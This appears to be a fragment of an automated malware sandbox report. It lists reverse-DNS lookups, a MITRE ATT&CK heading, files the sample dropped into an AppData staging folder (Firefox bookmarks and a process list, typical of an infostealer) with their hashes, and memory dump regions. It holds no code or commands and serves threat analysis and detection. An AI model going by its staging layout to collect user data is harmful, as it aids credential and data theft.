  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    73.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    34.58.20.217.in-addr.arpa
    dns
    71 B
    131 B
    1
    1

    DNS Request

    34.58.20.217.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\0993adca3a05158d4947d12883e78d74\Admin@HVDPCYGS_en-US\Browsers\Firefox\Bookmarks.txt

    Filesize

    105B

    MD5

    2e9d094dda5cdc3ce6519f75943a4ff4

    SHA1

    5d989b4ac8b699781681fe75ed9ef98191a5096c

    SHA256

    c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

    SHA512

    d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

  • C:\Users\Admin\AppData\Local\0993adca3a05158d4947d12883e78d74\Admin@HVDPCYGS_en-US\System\Process.txt

    Filesize

    4KB

    MD5

    33a216dfec0af276a74501bf81d1b4f7

    SHA1

    fe44716fa9ec4765270eb4d5515776868d0fb449

    SHA256

    5eaa02fcd4ec93c607a1c52d424ebcddce0d73ec92f4badde8b82701ba490334

    SHA512

    45de29ffe10ba78839370f13813f7b3abcad0d9ef8823d240ea0dd969152d74422dd44b45c2eead67eaef2b558799b7dabffef5a6efc262d133b92b0e5d4e11c

  • C:\Users\Admin\AppData\Local\655ba9c4db5c8f4c43f1e147b63bcc71\msgid.dat

    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

  • memory/2768-146-0x0000000074A50000-0x0000000075200000-memory.dmp

    Filesize

    7.7MB

  • memory/2768-3-0x00000000058B0000-0x0000000005916000-memory.dmp

    Filesize

    408KB

  • memory/2768-2-0x0000000074A50000-0x0000000075200000-memory.dmp

    Filesize

    7.7MB

  • memory/2768-0-0x0000000074A5E000-0x0000000074A5F000-memory.dmp

    Filesize

    4KB

  • memory/2768-147-0x0000000006460000-0x00000000064F2000-memory.dmp

    Filesize

    584KB

  • memory/2768-148-0x0000000006AB0000-0x0000000007054000-memory.dmp

    Filesize

    5.6MB

  • memory/2768-152-0x0000000006660000-0x000000000666A000-memory.dmp

    Filesize

    40KB

  • memory/2768-1-0x0000000000ED0000-0x0000000000F02000-memory.dmp

    Filesize

    200KB

  • memory/2768-158-0x0000000007300000-0x0000000007312000-memory.dmp

    Filesize

    72KB

  • memory/2768-183-0x0000000074A5E000-0x0000000074A5F000-memory.dmp

    Filesize

    4KB

  • memory/2768-184-0x0000000074A50000-0x0000000075200000-memory.dmp

    Filesize

    7.7MB

  • memory/2768-185-0x0000000074A50000-0x0000000075200000-memory.dmp

    Filesize

    7.7MB